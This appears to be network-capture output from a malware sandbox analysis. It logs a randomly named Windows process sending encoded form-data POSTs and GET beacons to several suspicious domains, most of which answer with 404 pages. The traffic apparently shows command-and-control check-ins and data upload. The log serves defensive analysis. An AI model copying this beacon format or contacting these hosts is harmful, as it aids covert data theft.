                                                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                                      Oct 22, 2024 09:07:14.565956116 CEST  185  IN
                                                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                      40  192.168.2.4  50047  38.88.82.56  80  5796  C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Oct 22, 2024 09:07:16.453634024 CEST  455  OUT  GET /lk0h/?_XPD90E=6gjDnw5yzGoGzEh46TJn2EnJvnJvbPG1/sFM8kPHd8kBOmP5HGhCeqzML2uvlXpT0wvdsm4ji4CabuXPMFeE122DOs0WcAnE5aNnG7jZJGeJUpqu0deDiTw=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.college-help.info
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:07:17.153773069 CEST  1236  IN  HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:17 GMT
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Thu, 17 Oct 2024 16:54:13 GMT
                                                                                                      ETag: "49d-624af093dd2da"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 1181
                                                                                                      Content-Type: text/html
                                                                                                      Connection: close
                                                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                                      Oct 22, 2024 09:07:17.153790951 CEST  185  IN
                                                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                      41  192.168.2.4  50048  3.33.130.190  80  5796  C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Oct 22, 2024 09:07:22.270895958 CEST  712  OUT  POST /17h7/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.owinvip.net
                                                                                                      Origin: http://www.owinvip.net
                                                                                                      Referer: http://www.owinvip.net/17h7/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=zgRK9aaXbRj1saF2AVNQ5Ku4R9HGp1Fd7mnzmEX4ctel2E+ShoEdnYWzbRTOtqfQ+VvPPxK/ot6DgkqqDxZvgZAQIcvw4c55wu/dUVNtWfeX+mjKLh4GsbAKtWhSgjQqAFtrsU8uLKps9LxfxJ0ybQoKtMCr/Ttqyvkorj+UIC8/eFnTHBY+aIEgwRKS91wqPg==


                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                      42  192.168.2.4  50049  3.33.130.190  80  5796  C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Oct 22, 2024 09:07:24.809139967 CEST  732  OUT  POST /17h7/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.owinvip.net
                                                                                                      Origin: http://www.owinvip.net
                                                                                                      Referer: http://www.owinvip.net/17h7/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=zgRK9aaXbRj1q5d2MWlQoqu5fdHGjVFR7mrzmFDWde6l2lOSipEdr4WzUxTLy6eS+VTHPxm/oseDghOqDCBghJASB8vl1855wu/dUVYAWf2X+XTKNA4Hg7AJqWhSqDQxAFtdsQ0ILJBs9ONfxdhAVQpPjsDJ3iEyr90g1lqoJDkTbDqJWw5pIIgTtWDmw2NjUkIMY5ilxxpoEmY6mGbPQQk=


                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                      43  192.168.2.4  50050  3.33.130.190  80  5796  C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Oct 22, 2024 09:07:27.354556084 CEST  10814  OUT  POST /17h7/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.owinvip.net
                                                                                                      Origin: http://www.owinvip.net
                                                                                                      Referer: http://www.owinvip.net/17h7/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E= [TRUNCATED]


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      44 | 192.168.2.4 | 50051 | 3.33.130.190 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:07:29.898114920 CEST | 449 | OUT | GET /17h7/?_XPD90E=+i5q+uzPXmftyZtCFmFN/bfjFcDFo1tt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBt4oYBPdG29ddF3diydwcHNPuP0zH2BXR0jrQ=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.owinvip.net
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:07:31.443809986 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 22 Oct 2024 07:07:31 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?_XPD90E=+i5q+uzPXmftyZtCFmFN/bfjFcDFo1tt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBt4oYBPdG29ddF3diydwcHNPuP0zH2BXR0jrQ=&qp=qTZ8t28"}</script></head></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      45 | 192.168.2.4 | 50052 | 178.79.184.196 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:07:36.510354042 CEST | 724 | OUT | POST /x3by/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.gucciqueen.shop
                                                                                                      Origin: http://www.gucciqueen.shop
                                                                                                      Referer: http://www.gucciqueen.shop/x3by/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=LocG8q5s0TizKq7Kw1P0V8ikGyFs/Zi1MW8KQmc1C617VQP81cZL3QJC+GBUevC2SbcfuDEzlT8VfntuC149gyj2/tIt/aZJ2iLhU4RzLLoZOe5QcKu0+7kD7b3YormV4rcFFInvjUGFmc4bwJ5BMJ8rDnxovPi5z6op8RtFpUvP/N5S0Cb7NlzAVo5YEsGk6g==
                                                                                                      Oct 22, 2024 09:07:37.305147886 CEST | 461 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:37 GMT
                                                                                                      Server: Apache/2.4.62 (Debian)
                                                                                                      Content-Length: 281
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      46 | 192.168.2.4 | 50053 | 178.79.184.196 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:07:39.057894945 CEST | 744 | OUT | POST /x3by/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.gucciqueen.shop
                                                                                                      Origin: http://www.gucciqueen.shop
                                                                                                      Referer: http://www.gucciqueen.shop/x3by/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=LocG8q5s0TizJO/KjmX0CMinJSFs15i5MXAKQnpqBIR7U1r82dZLnAJC0mBRavD4SbYXuGkzlScVfiRuDGQyvCjw+dIVy6ZJ2iLhU4VZLLwZOOJQdru1irkEtr3Y+bmR4rcrFJ7BjXuFmdIbzahGb58leXwWhMb05qR05iN2hVP23r0Ilz6sflXzIvwsJv7thpUy7DoYO4dD/rxHl4CdhbA=
                                                                                                      Oct 22, 2024 09:07:39.860501051 CEST | 461 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:39 GMT
                                                                                                      Server: Apache/2.4.62 (Debian)
                                                                                                      Content-Length: 281
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      47 | 192.168.2.4 | 50054 | 178.79.184.196 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:07:41.613723993 CEST | 10826 | OUT | POST /x3by/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.gucciqueen.shop
                                                                                                      Origin: http://www.gucciqueen.shop
                                                                                                      Referer: http://www.gucciqueen.shop/x3by/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E= [TRUNCATED]
                                                                                                      Oct 22, 2024 09:07:42.424339056 CEST | 461 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:42 GMT
                                                                                                      Server: Apache/2.4.62 (Debian)
                                                                                                      Content-Length: 281
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      48 | 192.168.2.4 | 50055 | 178.79.184.196 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:07:44.148391962 CEST | 453 | OUT | GET /x3by/?qp=qTZ8t28&_XPD90E=Gq0m/cYr7UOoL/rQtVX6VLGsSxhNwoS6IQg5KkZ1GbFCfXnP9OdFnXsg+153ZunkN9E3pnQymCUHBFpvF3MP7RrL9vQnx4xgqx+xE88oP7M+c4gRVOzDq74= HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.gucciqueen.shop
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:07:44.959856033 CEST | 461 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:44 GMT
                                                                                                      Server: Apache/2.4.62 (Debian)
                                                                                                      Content-Length: 281
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      49 | 192.168.2.4 | 50056 | 84.32.84.32 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:07:50.165730953 CEST | 715 | OUT | POST /9dj3/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.xtelify.tech
                                                                                                      Origin: http://www.xtelify.tech
                                                                                                      Referer: http://www.xtelify.tech/9dj3/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=3S4DnHotFY+RwbBrbwllD7h9N/s4kbzI2Cs0eeY1UtgjN21fmYgvBvYAuyM0/DdYQHOXOwUaNABMzOq37VFBOxUkVfeRPv9EMwec5oox9U0vzborzHMiL5I6ovYKMOdRO4mHhSjeV5etKhMnlw7MsYZ1lo/RUHIOFuCo/sgpi7sHZ+CchuzvT5xT7g/68l/MMw==


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      50 | 192.168.2.4 | 50057 | 84.32.84.32 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:07:52.717902899 CEST | 735 | OUT | POST /9dj3/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.xtelify.tech
                                                                                                      Origin: http://www.xtelify.tech
                                                                                                      Referer: http://www.xtelify.tech/9dj3/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=3S4DnHotFY+Rx7RrX3JlFbhiTvs4v7zM2Cg0ec1wU+UjMSlf8ZgvMPYAhSM11jdGQHKlO1saNAVMzKu34mtGNBUqMveXAP9EMwec5osf9QYvzr4rwmMtCZI9hPYKIOdVO4mhhT+5V6mtKlInlh7LmYZzho+ZZHcGIOnhnONIrowzc4PGwfS4B5Vgmn2OxmCFX3LGlf5PKnxT0XslHE5KV0o=


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      51 | 192.168.2.4 | 50058 | 84.32.84.32 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:07:55.364455938 CEST | 10817 | OUT | POST /9dj3/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.xtelify.tech
                                                                                                      Origin: http://www.xtelify.tech
                                                                                                      Referer: http://www.xtelify.tech/9dj3/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      52 | 192.168.2.4 | 50059 | 84.32.84.32 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:07:57.912074089 CEST | 450 | OUT | GET /9dj3/?_XPD90E=6QQjkzQCSvmfpuxcfzRzduVcOs4hgqLYwG0aK+01EuJHGUkxy7t2bY94jR0VySJAExaEEUdpRnl4gZG+8lJgOBQVMPOuCPV/IAHX+tBHmnMxxL42lCYTH+M=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.xtelify.tech
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:07:58.721070051 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                      Server: hcdn
                                                                                                      Date: Tue, 22 Oct 2024 07:07:58 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 10072
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      x-hcdn-request-id: 19bca5668e3dbfac425eee08978000a6-int-edge3
                                                                                                      Expires: Tue, 22 Oct 2024 07:07:57 GMT
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-Ranges: bytes


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      53 | 192.168.2.4 | 50060 | 188.114.96.3 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:08:03.872876883 CEST | 730 | OUT | POST /3p0l/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.timizoasisey.shop
                                                                                                      Origin: http://www.timizoasisey.shop
                                                                                                      Referer: http://www.timizoasisey.shop/3p0l/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=1LbI5jFIlZpsDWGQ+H92giUxA3s55Xq/EoIiKqVFqIKZp1hJz6bZFisL7V7rDdLPtG95vxZn1eP3+jvfXkGwC057sO8gb2rwpZnnnWjhkQPy+BSs0N2oOlohWOyvJiGslWwN5VJG5d/oyOtnVRQTIlz69HE1UH8Cba7HdJa6Y6QKEcaZerYkijm0unwQeaNKLw==
                                                                                                      Oct 22, 2024 09:08:04.948767900 CEST | 1056 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:08:04 GMT
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxe%2F10JfOoGGwnXQ19PXDAGVUEVm5cBOD6Ls3e%2BooDz2AQt72o6MN%2F1ob2m4tZMrp2ghE%2FEMzQ0yaRW5IhawKz5vZg2b5iZzbi1g7JXuKbQhEDw363ehQl8s%2BjX2SBbRLaz9%2FgslMmY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a76f797e6b7c-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=730&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      54 | 192.168.2.4 | 50061 | 188.114.96.3 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:08:06.419856071 CEST | 750 | OUT | POST /3p0l/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.timizoasisey.shop
                                                                                                      Origin: http://www.timizoasisey.shop
                                                                                                      Referer: http://www.timizoasisey.shop/3p0l/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=1LbI5jFIlZpsSFOQ5gJ2wyU2EHs5y3qzEoUiKo5Vq+SZqRtJw+vZLCsLul7udtL6tG5fv05n1eb3+iffUXezCk55gu8uGGrwpZnnnW22kQXy+wis0s2rDFomROyvNiGglWw75Xx45fHoyM1nVk8QDlz85HEkEHxSb6isdYOgVIY9I6XDPa5zwjCHzg5kTZwDQ92QpiQ+HujtJy0y02E9Eg4=
                                                                                                      Oct 22, 2024 09:08:07.286417961 CEST | 1067 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:08:07 GMT
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FMM6sQvfXcj%2B9BmkKTSFdZ7yx3VdOAg1RQLOrqQGmsBJujpvvq6UFreUwNkeEpDGdP29RLJIgLiC%2FZQNbTdCG1KQmmKCU%2F2wKkeawU27BN1TvHp8BDrCIUVt9fSiW%2BCCudcAzrT%2Bwi0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a77f7fb12e66-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
